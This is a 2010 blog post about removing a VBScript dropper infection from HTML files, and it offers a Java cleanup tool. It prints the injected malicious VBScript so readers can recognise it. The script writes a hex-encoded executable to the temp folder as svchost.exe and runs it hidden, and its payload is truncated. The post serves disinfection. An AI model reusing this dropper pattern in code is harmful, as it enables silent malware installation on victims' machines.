Monday, August 9, 2010

Script VB Dropper malware remover only for the infected html

We got infection of virus on pc last week. It is a new one and I found some discussions on the internet, for example this one:

http://www.bleepingcomputer.com/forums/topic336927.html

but found no real solution.

My colleague Dennis Sachs figured out that the avast! Pro Antivirus can deal this kind of malware. We gave it a shot and it works! Thanks Dennis! All infected exe, dll files are repaired and all infected html files were found. Then we got another problem: they can not be fixed by that program. It is Okay, I can write a Remover programm to handle it.

ATTENTION: this tool will ONLY handle all infected html/htm files. For fixing the infected .exe and .dll files, an antivirus program is still needed.

To check wether a html file is infected, you should just take a look at the bottom of the html/htm file. If you see the following code, congratulations! it is infected:


<SCRIPT language="VBScript"><! --
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B8000000 // very long here...
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//-->

you can use this tool to fix all infected html files.


How to use it:

1. java must be insalled on your computer.
2. download the VBSDropperRemover.jar and save it to [downloadedPath]\VBSDropperRemover.jar.
3. create a new directory [downloadedPath]\lib.

Or, you can also just download this zip file and extract it to your [downloadedPath].

call:

java -jar [downloadedPath]\VBSDropperRemover.jar






Posted by at 29 comments:
Subscribe to: Posts (Atom)